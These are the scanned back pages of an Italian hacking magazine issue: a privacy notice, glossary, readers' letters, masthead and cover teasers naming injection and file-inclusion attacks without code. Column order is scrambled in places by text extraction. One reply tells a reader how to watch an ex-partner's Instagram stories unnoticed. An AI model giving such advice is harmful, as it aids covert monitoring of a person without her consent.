Informativa ex Art.13 LGS 196/2003. I suoi dati saranno trattati da Sprea SpA, nonché dalle società con essa in rapporto di controllo e collegamento ai sensi dell’art. 2359 c.c. titolari del trattamento, per dare corso alla sua richiesta di abbonamento. A tale scopo, è indispensabile il conferimento dei dati anagrafici. Inoltre
previo suo consenso i suoi dati potranno essere trattati dalle Titolari per le seguenti finalità: 1) Finalità di indagini di mercato e analisi di tipo statistico anche al fine di migliorare la qualità dei servizi erogati, marketing, attività promozionali, offerte commerciali anche nell’interesse di terzi. 2) Finalità connesse alla comunica-
zione dei suoi dati personali a soggetti operanti nei settori editoriale, largo consumo e distribuzione, vendita a distanza, arredamento, telecomunicazioni, farmaceutico, finanziario, assicurativo, automobilistico e ad enti pubblici ed Onlus, per propri utilizzi aventi le medesime finalità di cui al suddetto punto 1) e 2). Per tutte
le finalità menzionate è necessario il suo esplicito consenso. Responsabile del trattamento è Sprea SpA via Torino 51 20063 Cernusco SN (MI). I suoi dati saranno resi disponibili alle seguenti categorie di incaricati che li tratteranno per i suddetti fini: addetti al customer service, addetti alle attività di marketing, addetti al
confezionamento. L’elenco aggiornato delle società del gruppo Sprea SpA, delle altre aziende a cui saranno comunicati i suoi dati e dei responsabili potrà in qualsiasi momento essere richiesto al numero +39 0287168197 “Customer Service”. Lei può in ogni momento e gratuitamente esercitare i diritti previsti dall’articolo 7
del D.Lgs.196/03 – e cioè conoscere quali dei suoi dati vengono trattati, farli integrare, modificare o cancellare per violazione di legge, o opporsi al loro trattamento – scrivendo a Sprea SpA via Torino 51 20063 Cernusco SN (MI).
 N E@ H AC KE RJ O U RN A L .i t
REDAZIO
REPLY
GLOSSARIO
DI BASE
METAVERSO
Network di mondi virtuali 3D
basati sulla connessione
social dei partecipanti.
Si tratta di un termine creato
da Neal Stephenson in Snow
Crash (1992), libro di
fantascienza cyberpunk,
in cui vi è una specie di realtà
virtuale condivisa tramite
Internet, e si viene
rappresentati in tre
dimensioni attraverso
il proprio avatar.
WALLET
In italiano portafoglio
elettronico, è un programma
o servizio Web che permette
agli utenti di memorizzare
e controllare in maniera
centralizzata le proprie
criptovalute come bitcoin,
ethereum e tutte le altre.
SEED
Codice di tredici parole che
viene fornito per l’attivazione
di un wallet Electrum e che
deve essere conservato
per recuperare la password.
NFC
Acronimo di Near Field
Communication, è una
tecnologia di trasmissione
che fornisce una connettività
senza fili bidirezionale a
distanza (contactless) a corto
raggio (fino a 10 cm).
 60
Condividi i tuoi dubbi co
a nuove idee e suggeri
vedere sulla rivista: re
dazione@hackerjourn
FASCICOLO SANITARIO
HACKERATO
Per la terza volta in poco più
di un mese non ho potuto
accedere al mio fascicolo
sanitario a causa di attacchi
hacker che hanno
compromesso l’infrastruttura
informatica. Ora però mi chiedo
a chi possa mai servire
conoscere i dati medici di una
persona o se si tratta solo
di bravate commesse da un
gruppo di aspiranti pirati. tratta di un investimento che
Riccardo
I continui attacchi alle
infrastrutture che gestiscono
i dati sanitari costituiscono un
problema non solo in Italia ma
in tutto il mondo. Infatti, anche
se nella maggior parte dei casi
non sono presenti dati come quelli
di carte di credito o conti bancari,
l’accesso alle informazioni
sanitarie permette di portare
a termine veri e propri furti di
identità e clonazione di polizze
assicurative. Inoltre, i registri
elettronici riguardanti i minori
risultano particolarmente preziosi
per i criminali informatici che
possono così clonare le loro
identità senza grossi rischi
visto che normalmente non
posseggono conti bancari.
Secondo un rapporto pubblicato
dalla società di ricerca AllClear ID,
n la redazione insieme
rresti
menti su quello che vo
al.it
la percentuale di furti di identità
è raddoppiata negli ultimi anni
per i minori di 10 anni. Addirittura
i furti di identità per i minori sono
ormai 35 volte superiori a quelli
osservati ai danni degli adulti nella
stessa fascia di popolazione.
INVESTIRE NEL METAVERSO
Un mio caro amico ha investito
quasi 1.000 euro per acquistare
un piccolo appartamento
nel Metaverso. Secondo lui si
in breve tempo potrà rivelarsi
molto profittevole. A me tutto
questo ricorda Second Life,
con un po’ di tecnologia in più
Carlo
In realtà Second Life nasce
come un gioco, una
simulazione avanzata di vita
virtuale social e poco di più.
Il Metaverso immaginato
da Mark Zuckerberg, che ha
addirittura fatto cambiare il
nome della sua società, è invece
un’iniziativa commerciale,
una sorta di mondo parallelo
in cui le persone che non sono
fisicamente vicine possono
interagire a tutti i livelli, a partire
da quello business. Indossando
visori di realtà virtuale come
il Meta Quest (il successore
di Oculus) e Project Cambria,
le persone potranno ritrovarsi
STOR IE IN A N O N IM O
Mi piacerebbe seguire le storie di Instagram che pubblica una
mia ex fidanzata senza che però lei lo sappia. Non esiste una
qualche app o anche un sito Internet che lo renda possibile?
Giancarlo

La soluzione più semplice a nostro parere rimane quella di crearti

un account secondario su Instagram, che la tua amica non può ricondurre
a te, e usare quello.
Se proprio vuoi provare una soluzione alternativa ti consigliamo
di scaricare un’app come Salva Storie dal Play Store di Android.
Si tratta di un’app che permette di salvare intere storie di Instagram
sul proprio smartphone in maniera completamente anonima. L’app
è gratuita, ma la rimozione dei banner pubblicitari richiede l’acquisto
della versione a pagamento, che costa 2,39 euro.

della password le possibilità di

Recuperare la password di un wallet è
successo sono ridotte al lumicino.
praticamente impossibile, a meno di non In alternativa dovresti almeno
disporre di una batteria di computer conoscere il seed, cioè l’elenco
di tredici parole che viene fornito
quantistici e di un software di forza bruta al momento della creazione del
wallet e che andrebbe sempre
in ambienti interamente all’epoca avevo acquistato per accuratamente conservato.
ricostruiti virtualmente con i pochi euro dei bitcoin che oggi
propri colleghi o amici e potranno dovrebbero valere una fortuna. SMARTWATCH NFC
fare esperienza di una realtà Solo che naturalmente non Il mio nuovo smartwatch Fitbit
mista, in cui elementi digitali si posseggo e non mi ricordo la mi permette di pagare
sovrappongono al mondo fisico. password. L’unica nota positiva direttamente dall’orologio
L’economia del Metaverso sarà è che non c’è un limite ai caricando una carta di credito.
basata su una criptovaluta tentativi di login, voi cosa mi Ma non c’è il rischio che
unificata, come il bitcoin, e sulla consigliate, potrei usare un qualcuno mi intercetti durante
compravendita di NFT. Per software di forza bruta ? la transazione?
questo investire oggi cifre anche Pierpaolo Lucia
relativamente basse potrebbe
rivelarsi un ottimo affare. Purtroppo le password di È più probabile che ti clonino
questi wallet, anche di quelli la carta di credito piuttosto
PASSWORD PER WALLET meno recenti, sono sempre che ti sniffino i dati da uno
Ho trovato all’interno di un molto complesse e difficili da smartwatch che usa una
vecchio disco fisso, di cui mi identificare. Certo, potresti connessione NFC. Vengono usate
ero dimenticato l’esistenza, sempre provare con un software infatti le più recenti funzionalità
un wallet Electrum del 2015. di forza bruta o a dizionario, ma di autenticazione, crittografia
Mi sembra di ricordare che non conoscendo tipo e lunghezza e sicurezza per proteggere i dati.

61 
 Il prossimo nu mero febbra io
5
sa ra‘ in ed icola da l 2
Ti telecomando
il telecomando getti
o degli og
Ecco come clonare un
case
più diffusi nelle nostre

Alla scoperta
d i N T FS
m ogni giorno...
Usiamo questo filesyste
ero?
ma lo conosciamo davv

Diventa un
Open Crash
Le multinazionali segugio deichella Rete
e gli strumenti
sfruttano il codice Impara a usare le tecn e le informazioni
libero senza dare tt
di OSINT per scovare tu o target
niente in cambio. disponibili sul tu
Ma c’è chi non
ci sta più!

Events Production: Giulia Sprea (Mind S.r.l.) - giulia@sprea.it
SERVIZIO QUALITÀ EDICOLANTI E DL
Sonia Lancellotti, Virgilio Cofano: Tel. 02 92432295 - distribuzione@sprea.it
351 5582739
Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.l. - 20090 Segrate
Distributore per l’Estero : SO.DI.P S.p.A. Via Bettola, 18 - 20092 Cinisello Balsamo (MI)
Tel. +390266030400 - Fax +390266030269 - sies@sodip.it - www.sodip.it
Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno

ABBONAMENTI E ARRETRATI Copyright : Sprea S.p.A.

Mensile - prezzo di copertina 3,90 €
www.hackerjournal.it - redazione@hackerjournal.it
La Divisione Informatica di Sprea edita anche:
WIN MAGAZINE ✦ LINUX PRO ✦ UBUNTU FACILE
MAC MAGAZINE✦ APP JOURNAL ✦IL MIO COMPUTER IDEA
Business Unit Manager: Massimiliano Zagaglia
Impaginazione: Andrea Carpani
Hanno collaborato: Antonio Dini, Francesco Pensabene, Maurizio Russo, Vincenzo
Digilio, Servizi editoriali: Backdoor di Gianmarco Bruni
Cover: Luca Patrian
Sprea S.p.A.
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia
PI 12770820152- Iscrizione camera Commercio 00746350149
Per informazioni, potete contattarci allo 02 924321
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato),
Maverick Greissing (Consigliere Delegato)
ADVERTISING, SPECIAL PROJECTS & EVENTS
Marketing: Marco Fregonara - Tel. 347 2240482 - marcofregonara@sprea.it
Segreteria: Emanuela Mapelli - Tel. 02 92432244 - emanuelamapelli@sprea.it
Abbonamenti: si sottoscrivono on-line su www.sprea.it/hackerjournal
abbonamenti@sprea.it
Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00)
Il prezzo dell’abbonamento è calcolato in modo etico perché sia un servizio
utile e non in concorrenza sleale con la distribuzione in edicola.
Arretrati: si acquistano on-line su www.sprea.it/arretrati
abbonamenti@sprea.it
Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00)
329 3922420
FOREIGN RIGHTS
Gabriella Re: Tel . 02 92432262 - gabriellare@sprea.it
SERVIZI CENTRALIZZATI
Art director: Silvia Taietti
Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni,
Marcella Gavinelli, Luca Patrian
Coordinamento: Federica Berzioli, Chiara Civilla, Laura Galimberti, Gabriella Re,
Tiziana Rosato, Milena Sacchi, Roberta Tempesta, Silvia Vitali
Amministrazione: Irene Citino, Erika Colombo (responsabile), Désirée Conti,
Sara Palestra - amministrazione@sprea.it
Ufficio Legale: Francesca Sigismondi
Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601.
ISSN 1594-5774
Direttore responsabile: Luca Sprea
Informativa su diritti e privacy
La Sprea S.p.A. titolare esclusiva della testata Hacker Journal e di tutti i diritti di pubblica-
zione e di diffusione in Italia. L’utilizzo da parte di terzi di testi, fotografie e disegni, anche
parziale, è vietato. L’Editore si dichiara pienamente disponibile a valutare - e se del caso
regolare - le eventuali spettanze di terzi per la pubblicazione di immagini di cui non sia
stato eventualmente possibile reperire la fonte. Informativa e Consenso in materia di trat-
tamento dei dati personali (Codice Privacy d.lgs. 196/03). Nel vigore del D.Lgs 196/03 il Ti-
tolare del trattamento dei dati personali, ex art. 28 D.Lgs. 196/03, è Sprea S.p.A. (di seguito
anche “Sprea”), con sede legale in Via Torino, 51 Cernusco sul Naviglio (MI). La stessa La in-
forma che i Suoi dati, eventualmente da Lei trasmessi alla Sprea, verranno raccolti, trattati
e conservati nel rispetto del decreto legislativo ora enunciato anche per attività connesse
all’azienda. La avvisiamo, inoltre, che i Suoi dati potranno essere comunicati e/o trattati
(sempre nel rispetto della legge), anche all’estero, da società e/o persone che prestano
servizi in favore della Sprea. In ogni momento Lei potrà chiedere la modifica, la correzione
e/o la cancellazione dei Suoi dati ovvero esercitare tutti i diritti previsti dagli artt. 7 e ss. del
D.Lgs. 196/03 mediante comunicazione scritta alla Sprea e/o direttamente al personale
Incaricato preposto al trattamento dei dati. La lettura della presente informativa deve
intendersi quale presa visione dell’Informativa ex art. 13 D.Lgs. 196/03 e l’invio dei Suoi
dati personali alla Sprea varrà quale consenso espresso al trattamento dei dati personali
secondo quanto sopra specificato. L’invio di materiale (testi, fotografie, disegni, etc.) alla
Sprea S.p.A. deve intendersi quale espressa autorizzazione alla loro libera utilizzazione da
parte di Sprea S.p.A. Per qualsiasi fine e a titolo gratuito, e comunque, a titolo di esempio,
alla pubblicazione gratuita su qualsiasi supporto cartaceo e non, su qualsiasi pubblica-
zione (anche non della Sprea S.p.A.), in qualsiasi canale di vendita e Paese del mondo.
Il materiale inviato alla redazione non potrà essere restituito.
 IN EDICOLA
DAL 14 GENNAIO

Scansiona il QR Code
edi67 / italian / ghost

Acquistala su www.sprea.it/scienze
versione digitale disponibile dall’11 gennaio
 PU BBLICITÀ
100% INDIPENDENTE! NO

T utto quello
ch e g l i a l t r i
n o n o s a n o d i r t i !

IN QUES T O N U M E R O
VULNERABILITÀ | Bucare la chat senza SQL
Il sistema di messaggistica Rocket.Chat ha alcune noSQL injection
che permettono di bypassare il login ottenendo i privilegi di root

PENETRATION TEST | Attacco ai log!

Dopo XSS e DoS, ecco a voi un attacco RCE in salsa log usando un attacco
di tipo Local File Inclusion e la nostra palestra per pentester in erba

DATI PERSONALI | Google maestro di Facebook

Mark Zuckerberg ha imparato come estrarre e monetizzare i dati dalle
persone grazie al lavoro fatto venti anni fa da Larry Page e Sergei Brin

LETTERE | Storie in anonimo

Le domande dei lettori, le risposte degli esperti della redazione.
Anche online sul nostro sito: https://hackerjournal.it

NUMERO 259 • MENSILE • 3.90 €

P.I. 29-01-2022 - Febbraio

Prezzi esteri: AUT € 7,50 - BE € 7,00 - LUX € 6,50 - F+PM € 9,50 FR + € 10,50 PM - ES € 6,00 - PT (Cont.) € 5,50 - CH Tedesca CHF 8,3 - CH Ticino CHF 7,3 - OLANDA € 7,50